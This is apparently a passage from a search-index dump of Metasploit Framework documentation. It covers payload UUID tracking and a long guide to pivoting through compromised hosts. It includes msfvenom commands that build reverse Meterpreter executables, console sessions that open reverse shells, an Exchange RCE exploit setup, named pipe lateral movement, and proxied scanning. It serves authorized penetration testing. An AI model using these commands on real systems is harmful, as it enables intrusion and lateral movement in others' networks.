cmd/windows/shell_reverse_tcp_ruby | . Difficulties . Changing module names always entails a backwards compatibility issue. | Experienced users are used to the old names and may be confused and annoyed by the change. This is mitigated somewhat by the fact that these payloads are probably used less often than other architectures, and thus users will have less ingrained muscle memory for them. | It will break users’ existing RC scripts that set payloads to any of the renamed modules. | . I think consistency across platforms and architectures is more important and will result in less confusion overall. ",
    "url": "/docs/development/propsals/payload-rename-justification.html",
    "relUrl": "/docs/development/propsals/payload-rename-justification.html"
  },"723": {
    "doc": "Payload UUID",
    "title": "Payload UUID",
    "content": "In mid-2015, a new feature was added to many HTTP and TCP Metasploit payloads: Payload UUIDs. A Payload UUID is a 16-byte value that encodes an 8-byte identifier, a 1-byte architecture ID, a 1-byte platform ID, a 4-byte timestamp, and two additional bytes for obfuscation. The source code comments go into more detail. In the case of HTTP payloads, the 16-byte UUID value is encoded in base64url format resulting in a 22-byte string. This value is always placed at the beginning of the URL used by the payload. TCP payloads send the 16-byte raw value over the socket once a connection is established. The goal of Payload UUIDs is three-fold: . | Uniquely identify a generated payload. This is important when running social engineering campaigns to identify what specific payload a target executed. If an email campaign resulted in one user forwarding a payload to another user before it was executed, this can be determined by reviewing the UUID in the session listing. | Drop connections that do not match known UUIDs. This allows a listener to be set up that only allows known sessions to connect, which is important when running internet-facing payload handlers. | Enable universal handlers. The embedded platform and architecture identifiers allow the listener to determine what type of stage to send back to a stager. This will eventually allow for a single listener to be used with multiple exploits, even those that target different platforms and architectures. | . Specifying the UUID . Although Payload UUIDs are normally random, it is possible to specify a static UUID value using the PayloadUUIDRaw option. This option takes an 8-byte hex string, such as “0011223344556677”. For example: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDRaw=4444444444444444 -f exe -o payload.exe . 
Instead of specifying a static UUID as the raw 8-byte value, it is also possible to derive a static UUID using an arbitrary-length string using the PayloadUUIDSeed option: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDSeed=ShellsAreDelicious -f exe -o payload.exe . Tracking the UUID . Payload UUIDs are enabled by default, but are not tracked unless the PayloadUUIDTracking option is set to true. Setting this option causes a new entry to be created in ~/.msf4/payloads.json when any UUID-enabled payload is generated. It is also possible to create a local-only name for a given UUID using the PayloadUUIDName. The example below will create a new registered payload with a custom name: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe $ cat ~/.msf4/payloads.json { \"68017d72958c40f6\": { \"arch\": \"x86\", \"platform\": \"windows\", \"timestamp\": 1435277049, \"payload\": \"payload/windows/meterpreter/reverse_https\", \"datastore\": {\"AutoLoadStdapi\":true,\"AutoRunScript\":\"\",\"AutoSystemInfo\":true,\"AutoVerifySession\":true,\"AutoVerifySessionTimeout\":30,\"EXITFUNC\":\"process\",\"EnableStageEncoding\":false,\"EnableUnicodeEncoding\":false,\"HttpUnknownRequestResponse\":\"\\u003Chtml\\u003E\\u003Cbody\\u003E\\u003Ch1\\u003EIt works!\\u003C/h1\\u003E\\u003C/body\\u003E\\u003C/html\\u003E\",\"IgnoreUnknownPayloads\":false,\"InitialAutoRunScript\":\"\",\"LHOST\":\"127.1.1.1\",\"LPORT\":4444,\"MeterpreterServerName\":\"Apache\",\"MeterpreterUserAgent\":\"Mozilla/4.0 (compatible; MSIE 6.1; Windows 
NT)\",\"OverrideRequestHost\":false,\"PAYLOADUUIDNAME\":\"EmailCampaign20150101\",\"PayloadProxyPort\":0,\"PayloadProxyType\":\"HTTP\",\"PayloadUUIDTracking\":true,\"PrependMigrate\":false,\"ReverseListenerBindPort\":0,\"SessionCommunicationTimeout\":300,\"SessionExpirationTimeout\":604800,\"SessionRetryTotal\":3600,\"SessionRetryWait\":10,\"StageEncoderSaveRegisters\":\"\",\"StageEncodingFallback\":true,\"StagerRetryCount\":10,\"StagerURILength\":0,\"StagerVerifySSLCert\":false,\"VERBOSE\":false}, \"name\": \"EmailCampaign20150101\", \"urls\": [ \"/aAF9cpWMQPb-3f_cq1FoJA040uMw26kAnvroJdztpVzDrNpqbpT7t3DyYy0cR2TyQE87XxHgIOKiYwP2FJNlNjrBXWQNiGWtzUK1ueJ0DyFjCXmULVo_gGrvi\" ] } } . Once this payload is launched, the output of the sessions -l -v command will show the UUID, whether or not the UUID is registered, and any locally-assigned name of the UUID: . msf exploit(handler) &amp;gt; run -j [*] 127.0.0.1:36235 (UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z) Staging Native payload ... [*] Meterpreter session 1 opened (127.1.1.1:4444 -&amp;gt; 127.0.0.1:36235) at 2015-06-25 17:12:40 -0700 msf exploit(handler) &amp;gt; sessions -l -v Active sessions =============== Session ID: 1 Type: meterpreter x86/win32 Info: fang\\hdm @ fang Tunnel: 127.1.1.1:4444 -&amp;gt; 127.0.0.1:36235 (127.0.0.1) Via: exploit/multi/handler UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z MachineID: 1fd541d2c4278e2d0c1b02f17f142f2b CheckIn: 1s ago @ 2015-06-25 17:12:47 -0700 Registered: Yes - Name=\"EmailCampaign20150101\" . Whitelisting UUIDs . The ~/.msf4/payloads.json file can also be used as a whitelist. This makes it possible to run a listener on a common port on a public IP address without the Metasploit Framework instance being flooded with bogus sessions. To enable whitelisting for HTTP payloads, set the IgnoreUnknownPayloads option to true in the handler instance. 
Any incoming request that does not match both a registered Payload UUID and one of the pre-generated URLs will be ignored. The payloads.json file can be copied between Metasploit Framework instances and even hand-edited while the framework is running. ",
    "url": "/docs/using-metasploit/intermediate/payload-uuid.html",
    "relUrl": "/docs/using-metasploit/intermediate/payload-uuid.html"
  },"724": {
    "doc": "Pivoting in Metasploit",
    "title": "Overview",
    "content": "Whilst in test environments one is often looking at flat networks that have only one subnet and one network environment, the reality is that when it comes to pentests that attempt to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in between that are intended to keep these networks separate from one another. In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether physical network adapters, virtual network adapters, or a combination of both. Once you have compromised a host that has multiple network adapters, you can use the session you have obtained on that host to turn it into a pivot, relaying traffic through the compromised host to the target machine that you want to access. This allows you, as an attacker, to access machines on networks that you might not otherwise be able to reach, by utilizing the access to internal networks that the compromised machine has. Now that we understand some of the background, let’s see this in action by setting up a sample environment and walking through some of Metasploit’s pivoting features. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#overview",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#overview"
  },"725": {
    "doc": "Pivoting in Metasploit",
    "title": "Supported Session Types",
    "content": "Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is used in the examples below, keep in mind that this would also work with an SSH session. We have used Meterpreter here purely for demonstration purposes. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#supported-session-types",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#supported-session-types"
  },"726": {
    "doc": "Pivoting in Metasploit",
    "title": "Testing Pivoting",
    "content": "Target Environment Setup . | Kali Machine . | Internal: None | External: 172.19.182.171 | . | Windows 11 Machine (used as pivot) . | Internal: 169.254.16.221 | External: 172.19.185.34 | . | Windows Server 2019 Machine (final target) . | Internal: 169.254.204.110 | External: None | . | . For the purpose of simplicity we will assume we have a session on the Windows 11 box, which we will use as a pivot to route our traffic through to the Windows Server 2019 box at 169.254.204.110. There are a few ways to register this route in Metasploit so that it knows how to redirect traffic appropriately. Let’s take a look at these methods. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#testing-pivoting",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#testing-pivoting"
  },"727": {
    "doc": "Pivoting in Metasploit",
    "title": "AutoRoute",
    "content": "One of the easiest ways to do this is to use the post/multi/manage/autoroute module which will help us automatically add in routes for the target to Metasploit’s routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Let’s look at a sample run of this command: . meterpreter &amp;gt; background [*] Backgrounding session 1... msf6 exploit(multi/handler) &amp;gt; use post/multi/manage/autoroute msf6 post(multi/manage/autoroute) &amp;gt; show options Module options (post/multi/manage/autoroute): Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: add, auto add, print, delete, default) NETMASK 255.255.255.0 no Netmask (IPv4 as \"255.255.255.0\" or CIDR as \"/24\" SESSION yes The session to run this module on SUBNET no Subnet (IPv4, for example, 10.10.10.0) msf6 post(multi/manage/autoroute) &amp;gt; set SESSION 1 SESSION =&amp;gt; 1 msf6 post(multi/manage/autoroute) &amp;gt; set SUBNET 169.254.0.0 SUBNET =&amp;gt; 169.254.0.0 msf6 post(multi/manage/autoroute) &amp;gt; set NETMASK /16 NETMASK =&amp;gt; /16 msf6 post(multi/manage/autoroute) &amp;gt; show options Module options (post/multi/manage/autoroute): Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: add, auto add, print, delete, default) NETMASK /16 no Netmask (IPv4 as \"255.255.255.0\" or CIDR as \"/24\" SESSION 1 yes The session to run this module on SUBNET 169.254.0.0 no Subnet (IPv4, for example, 10.10.10.0) msf6 post(multi/manage/autoroute) &amp;gt; run [!] SESSION may not be compatible with this module: [!] * incompatible session platform: windows [*] Running module against WIN11-TEST [*] Searching for subnets to autoroute. [+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table. 
[+] Route added to subnet 172.19.176.0/255.255.240.0 from host's routing table. [*] Post module execution completed msf6 post(multi/manage/autoroute) &amp;gt; . If we now use Meterpreter’s route command we can see that we have two routing table entries within Metasploit’s routing table that are tied to Session 1, aka the session on the Windows 11 machine. This means any time we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets. msf6 post(multi/manage/autoroute) &amp;gt; route IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 172.19.176.0 255.255.240.0 Session 1 [*] There are currently no IPv6 routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . All right, so that’s one way, but what if we wanted to do this manually? First off, to flush all routes from the routing table, we run route flush followed by route to double check that we have successfully removed the entries. msf6 post(multi/manage/autoroute) &amp;gt; route flush msf6 post(multi/manage/autoroute) &amp;gt; route [*] There are currently no routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . Now let’s try doing the same thing manually. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#autoroute",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#autoroute"
  },"728": {
    "doc": "Pivoting in Metasploit",
    "title": "Route",
    "content": "Here we can use route add &amp;lt;IP ADDRESS OF SUBNET&amp;gt; &amp;lt;NETMASK&amp;gt; &amp;lt;GATEWAY&amp;gt; to add the routes from within Metasploit, followed by route print to print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or, as is more commonly the case, the session ID of an existing session to pivot the traffic through. msf6 post(multi/manage/autoroute) &amp;gt; route add 169.254.0.0 255.255.0.0 1 [*] Route added msf6 post(multi/manage/autoroute) &amp;gt; route add 172.19.176.0 255.255.240 1 [-] Invalid gateway msf6 post(multi/manage/autoroute) &amp;gt; route add 172.19.176.0 255.255.240.0 1 [*] Route added msf6 post(multi/manage/autoroute) &amp;gt; route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 172.19.176.0 255.255.240.0 Session 1 [*] There are currently no IPv6 routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . Finally we can check that the route will use session 1 by using route get 169.254.204.110 . msf6 post(multi/manage/autoroute) &amp;gt; route get 169.254.204.110 169.254.204.110 routes through: Session 1 msf6 post(multi/manage/autoroute) &amp;gt; . If we want to then remove a specific route (in this case the 172.19.176.0/20 route, since we don’t need it for this test), we can issue the route del or route remove command with the syntax route remove &amp;lt;IP ADDRESS OF SUBNET&amp;gt;&amp;lt;NETMASK IN SLASH FORMAT&amp;gt; &amp;lt;GATEWAY&amp;gt; . Example: . msf6 post(multi/manage/autoroute) &amp;gt; route remove 172.19.176.0/20 1 [*] Route removed msf6 post(multi/manage/autoroute) &amp;gt; route IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 [*] There are currently no IPv6 routes defined. 
msf6 post(multi/manage/autoroute) &amp;gt; . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#route",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#route"
  },"729": {
    "doc": "Pivoting in Metasploit",
    "title": "Using the Pivot",
    "content": "At this point we can now use the pivot with any Metasploit modules as shown below: . msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; show options Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword thePassword yes The password to use to authenticate to the Exchange server HttpUsername administrator yes The username to log into the Exchange server as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 169.254.204.110 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 443 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.19.182.171 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Command msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; check [*] Target is an Exchange Server! [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version! 
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#using-the-pivot",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#using-the-pivot"
  },"730": {
    "doc": "Pivoting in Metasploit",
    "title": "SMB Named Pipe Pivoting in Meterpreter",
    "content": "The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality. First open a Windows Meterpreter session to the pivot machine: . msf6 &amp;gt; use payload/windows/x64/meterpreter/reverse_tcp smsf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; set lhost 172.19.182.171 lhost =&amp;gt; 172.19.182.171 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; set lport 4578 lport =&amp;gt; 4578 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Payload Handler Started as Job 0 [*] Started reverse TCP handler on 172.19.182.171:4578 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; [*] Sending stage (200774 bytes) to 172.19.185.34 [*] Meterpreter session 1 opened (172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500 . Create named pipe pivot listener on the pivot machine, setting -l to the pivot’s bind address: . msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; sessions -i -1 [*] Starting interaction with 1... meterpreter &amp;gt; pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows [+] Successfully created pipe pivot. meterpreter &amp;gt; background [*] Backgrounding session 1... Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine. Note there is no need to start a handler for the named pipe payload. msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; show options Module options (payload/windows/x64/meterpreter/reverse_named_pipe): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) PIPEHOST . 
yes Host of the pipe to connect to PIPENAME msf-pipe yes Name of the pipe to listen on msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; set pipehost 169.254.16.221 pipehost =&amp;gt; 169.254.16.221 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; generate -f exe -o revpipe_meterpreter_msfpipe.exe [*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe... After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot. msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -&amp;gt; 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows WIN11\\msfuser @ WIN11 172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674 (172.19.185.34) 2 meterpreter x64/windows WIN2019\\msfuser @ WIN2019 Pivot via [172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674] (169.254.204.110) . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#smb-named-pipe-pivoting-in-meterpreter",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#smb-named-pipe-pivoting-in-meterpreter"
  },"731": {
    "doc": "Pivoting in Metasploit",
    "title": "Pivoting External Tools",
    "content": "portfwd . Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally, this method has been deprecated for some time now. Local Port Forwarding . To set up a port forward using Metasploit, use the portfwd command within a supported session’s console such as the Meterpreter console. Using portfwd -h will bring up a help menu similar to the following: . meterpreter &amp;gt; portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -h Help banner. -i Index of the port forward entry to interact with (see the \"list\" command). -l Forward: local port to listen on. Reverse: local port to connect to. -L Forward: local host to listen on (optional). Reverse: local host to connect to. -p Forward: remote port to connect to. Reverse: remote port to listen on. -r Forward: remote host to connect to. -R Indicates a reverse port forward. meterpreter &amp;gt; . To add a port forward, use portfwd add and specify the -l, -p and -r options at a minimum to specify the local port to listen on, the remote port to connect to, and the target host to connect to respectively. meterpreter &amp;gt; portfwd add -l 1090 -p 443 -r 169.254.37.128 [*] Local TCP relay created: :1090 &amp;lt;-&amp;gt; 169.254.37.128:443 meterpreter &amp;gt; . Note that something that is commonly misunderstood here is that the port will be opened on the machine running Metasploit itself, NOT on the target that the session is running on. We can then connect to the target host using the local port on the machine running Metasploit: . ~/git/metasploit-framework │ master ?21 wget --no-check-certificate https://127.0.0.1:1090 --2022-04-08 14:36:23-- https://127.0.0.1:1090/ Connecting to 127.0.0.1:1090... connected. WARNING: cannot verify 127.0.0.1's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. 
WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘127.0.0.1’. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://127.0.0.1/owa/ [following] --2022-04-08 14:36:23-- https://127.0.0.1/owa/ Connecting to 127.0.0.1:443... failed: Connection refused. ~/git/metasploit-framework │ master ?21 . Note that you may need to edit your /etc/hosts file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting. Listing Port Forwards and Removing Entries . You can list port forwards using the portfwd list command. To delete all port forwards use portfwd flush. Alternatively, to selectively delete local port forwarding entries, use portfwd delete -l &amp;lt;local port&amp;gt;. meterpreter &amp;gt; portfwd delete -l 1090 [*] Successfully stopped TCP relay on 0.0.0.0:1090 meterpreter &amp;gt; portfwd list No port forwards are currently active. meterpreter &amp;gt; . Remote Port Forwarding . This scenario differs from the one above. Previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host. With reverse port forwarding we are instead instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit. To set up a reverse port forward, use portfwd add -R within a supported session and then specify the -l, -L and -p options. The -l option specifies the port to forward the traffic to, the -L option specifies the IP address to forward the traffic to, and the -p option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with). 
For example, to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute portfwd add -R -l 4444 -L 172.20.97.73 -p 9093 as shown below, which would then cause the machine we have a session on to start listening on port 9093 for incoming connections. meterpreter &amp;gt; portfwd add -R -l 4444 -L 172.20.97.73 -p 9093 [*] Local TCP relay created: 172.20.97.73:4444 &amp;lt;-&amp;gt; :9093 meterpreter &amp;gt; netstat -a Connection list =============== Proto Local addre Remote addr State User Inode PID/Program name ss ess ----- ----------- ----------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 488/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:504 0.0.0.0:* LISTEN 0 0 5780/svchost.exe 0 tcp 0.0.0.0:909 0.0.0.0:* LISTEN 0 0 2116/bind_tcp_x64_4444.exe 3 . We can confirm this works by setting up a listener . XXX - to work on and confirm…. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#pivoting-external-tools",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#pivoting-external-tools"
  },"732": {
    "doc": "Pivoting in Metasploit",
    "title": "Socks Module",
    "content": "Once routes are established, Metasploit modules can access the IP range specified in the routes. For other applications to access the routes, a little bit more setup is necessary. One way to solve this involves using the auxiliary/server/socks_proxy Metasploit module to set up a socks4a proxy, and then using proxychains-ng to direct external applications towards the established socks4a proxy server that Metasploit has set up so that external applications can use Metasploit’s internal routing table. Socks Server Module Setup . Metasploit can launch a SOCKS proxy server using the module: auxiliary/server/socks_proxy. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit’s routing tables. Here is an example of how this module might be used: . msf6 &amp;gt; use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) &amp;gt; show options Module options (auxiliary/server/socks_proxy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no Proxy password for SOCKS5 listener SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 1080 yes The port to listen on USERNAME no Proxy username for SOCKS5 listener VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5) Auxiliary action: Name Description ---- ----------- Proxy Run a SOCKS proxy server msf6 auxiliary(server/socks_proxy) &amp;gt; set SRVHOST 127.0.0.1 SRVHOST =&amp;gt; 127.0.0.1 msf6 auxiliary(server/socks_proxy) &amp;gt; set SRVPORT 1080 SRVPORT =&amp;gt; 1080 msf6 auxiliary(server/socks_proxy) &amp;gt; run [*] Auxiliary module running as background job 0. 
msf6 auxiliary(server/socks_proxy) &amp;gt; [*] Starting the SOCKS proxy server msf6 auxiliary(server/socks_proxy) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Auxiliary: server/socks_proxy msf6 auxiliary(server/socks_proxy) &amp;gt; . proxychains-ng Setup . First, make sure that you have installed proxychains-ng. You can also use proxychains; however, most repositories such as Ubuntu will have an outdated version of it, and it has crashed before in my tests, so it is highly recommended to use proxychains-ng instead, which is actively maintained. You can install it with the following commands: . git clone https://github.com/rofl0r/proxychains-ng cd proxychains-ng make sudo make install . Now edit the proxychains configuration file located at /etc/proxychains.conf. Add the below line to the end of the file to set proxychains-ng to use the SOCKS 5 server that you just set up. Note that you may need to use sudo to edit this file due to the default permissions on this file preventing anyone but root from writing to it. socks5 127.0.0.1 1080 . The final file should look something like this: . # proxychains.conf VER 3.1 # # HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS. # # The option below identifies how the ProxyList is treated. 
# only one option should be uncommented at time, # otherwise the last appearing option will be accepted # #dynamic_chain # # Dynamic - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped) # otherwise EINTR is returned to the app # strict_chain # # Strict - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # all proxies must be online to play in chain # otherwise EINTR is returned to the app # #random_chain # # Random - Each connection will be done via random proxy # (or proxy chain, see chain_len) from the list. # this option is good to test your IDS :) # Make sense only if random_chain #chain_len = 2 # Quiet mode (no output from library) #quiet_mode # Proxy DNS requests - no leak for DNS data proxy_dns # Some timeouts in milliseconds tcp_read_time_out 15000 tcp_connect_time_out 8000 # ProxyList format # type host port [user pass] # (values separated by 'tab' or 'blank') # # # Examples: # # socks5 192.168.67.78 1080 lamer secret # http 192.168.89.3 8080 justu hidden # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # # # proxy types: http, socks4, socks5 # ( auth types supported: \"basic\"-http \"user/pass\"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to \"tor\" socks5 127.0.0.1 1080 . Note: If there are other proxy entries in the configuration file, you may need to comment them out as they may interfere with proper routing. Using Proxychains-NG . Now you can combine proxychains-ng with other applications like Nmap, Nessus, Firefox and more to scan or access machines and resources through the Metasploit routes. All you need to do is call proxychains-ng before the needed application. No need to change the proxy settings in the respective application. 
~/git/metasploit-framework │ master ?21 wget https://169.254.37.128 --2022-04-08 13:52:23-- https://169.254.37.128/ Connecting to 169.254.37.128:443... failed: No route to host. ~/git/proxychains-ng │ master ?1 proxychains4 wget https://169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 --2022-04-08 14:06:52-- https://169.254.37.128/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. ERROR: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. ERROR: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. To connect to 169.254.37.128 insecurely, use `--no-check-certificate'. ~/git/proxychains-ng │ master ?1 proxychains4 wget --no-check-certificate https://169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 --2022-04-08 14:26:53-- https://169.254.37.128/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://169.254.37.128/owa/ [following] --2022-04-08 14:26:53-- https://169.254.37.128/owa/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. 
HTTP request sent, awaiting response... 302 Found Location: https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&amp;amp;reason=0 [following] --2022-04-08 14:26:54-- https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&amp;amp;reason=0 Reusing existing connection to 169.254.37.128:443. HTTP request sent, awaiting response... 200 OK Length: 58714 (57K) [text/html] Saving to: ‘index.html’ index.html 100%[===========================&amp;gt;] 57.34K --.-KB/s in 0.1s 2022-04-08 14:26:54 (573 KB/s) - ‘index.html’ saved [58714/58714] ~/git/proxychains-ng │ master ?2 . Scanning . For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UDP traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans. For Nmap and Zenmap, the example below shows the commands that can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow. $ sudo proxychains4 nmap -n -sT -sV -PN -p 445 10.10.125.0/24 . Here is an example of how this might look when scanning a single host for port 445 over proxychains-ng: . ~/git/proxychains-ng │ master ?1 proxychains4 nmap -n -sT -A -PN -p 445 169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-08 14:08 CDT [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... 
